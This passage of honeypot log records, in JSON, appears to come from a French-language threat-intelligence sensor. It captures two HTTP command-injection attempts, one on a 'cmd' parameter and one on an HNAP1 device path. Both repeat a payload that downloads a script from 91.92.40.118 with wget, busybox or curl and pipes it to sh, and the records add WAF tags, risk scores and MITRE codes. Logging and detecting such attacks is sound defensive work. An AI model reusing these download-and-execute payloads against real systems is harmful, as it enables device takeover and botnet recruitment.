\u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002216d873425a44abcbc561dbf80ce01723ad77c248\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 260, \u0022payload_entropy\u0022: 5.047478359257861, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022f9ca9660e146f4f49a22a16a64c17b0a6189ec5a\u0022, \u0022event_fingerprint\u0022: \u0022aada51a53a3be595829bbfda2738ca40a394e82f\u0022, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002283e9b9f72256a5732efa8203d28a7da0\u0022, \u0022path_pattern_hash\u0022: \u00227b027b43ee202e99587271c9aa97af77\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022query_string\u0022: \u0022cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022query_string\u0022: \u0022cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nConnection: close\u0022, \u0022payload_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002206b2d6a1e497f3b37a52a0227e11bd2ebc8f5380\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_config\u0022, \u0022http_scanner_params\u0022, \u0022http_suspicious_params\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_config\u0022, \u0022http_scanner_params\u0022, \u0022http_suspicious_params\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":260},{"id":11809366,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55330,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":87,"waf_tags":"[\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022]","http_method":"GET","http_target":"\/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 13, \u0022http_path_ext\u0022: \u0022sh%7csh%20-s%20dhnap2%60\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00221fb679dc6cc24300725ed92bb56df033406a9dbc\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 556, \u0022payload_entropy\u0022: 5.103636100253619, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d7c2667210f6f3d3611b5616f56991abfbdf9334\u0022, \u0022event_fingerprint\u0022: \u0022371f00e3108c666d9a21ebf97a0a2f03ec1bea99\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 140, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022, \u0022pat-0231\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022, \u0022Probe \/HNAP1\/\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022, \u0022pat-0231\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022375dd5be7f5235bfcb5bea4a0184a447\u0022, \u0022path_pattern_hash\u0022: \u00225342c0a41e9aeca887ae259faa8ece9f\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60\u0022, \u0022waf_tags\u0022: [\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60\u0022, \u0022waf_tags\u0022: [\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60 HTTP\/1.1\\r\\nHost: 62.3.\u0022, \u0022payload_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022589c9f0ce1099a5a9edbdc6935690a6a2ed20ccc\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhna\u2026\u0022, \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.4\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 13 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, 